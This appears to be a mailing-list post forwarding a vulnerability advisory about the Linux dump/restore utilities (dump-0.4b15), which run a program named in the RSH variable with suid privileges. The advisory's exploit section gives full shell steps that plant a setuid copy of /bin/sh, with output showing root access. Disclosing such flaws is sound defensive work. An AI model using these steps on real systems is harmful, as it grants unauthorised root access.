Linux dump/restore utilities can be exploited to gain root ------------------------------------------------------------------------ SUMMARY The Linux dump and restore commands execute external program with suid privilege. This fact allows local users to gain root privileges by a simple modification to the remote executed shell (RSH parameter). DETAILS Vulnerable systems: dump-0.4b15 Exploit: $ export TAPE=garbage:garbage $ export RSH=/home/mat/execute_this $ cat > /home/mat/execute_this #!/bin/sh cp /bin/sh /home/mat/sh chmod 4755 /home/mat/sh $ chmod 755 /home/mat/execute_this $ /sbin/dump -0 / DUMP: Connection to garbage established. DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000 DUMP: Date of last level 0 dump: the epoch DUMP: Dumping /dev/hda2 (/) to garbage on host garbage DUMP: Label: none /dev/hda2: Permission denied while opening filesystem $ ls -la /home/mat/sh -rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh $ /home/mat/sh bash# id uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat) -- Eko Sulistiono MIKRODATA & AntiVirus Media Web: http://www.mikrodata.co.id/ WAP: http://www.mikrodata.co.id/wap/index.wml This message contains no viruses. Guaranteed by AVP. ------------------------------------------------------------------------ Forum Komunikasi Penulis-Pembaca MIKRODATA (FKPPM) Informasi : http:[EMAIL PROTECTED] Arsip : http://www.mail-archive.com/forum%40mikrodata.co.id/ WAP : http://mikrodata.co.id/wap/index.wml Milis ini menjadi kontribusi beberapa rubrik yang diasuh tim MIKRODATA. Termasuk rubrik-rubrik yang ada di media lain. Memakai, Menyebarluaskan, dan Memperbanyak software bajakan adalah tindakan kriminal. Please check with the latest AVP update before you ask about virus: ftp://mikrodata.co.id/avirus_&_security/AntiViral_Toolkit_Pro/avp30.zip
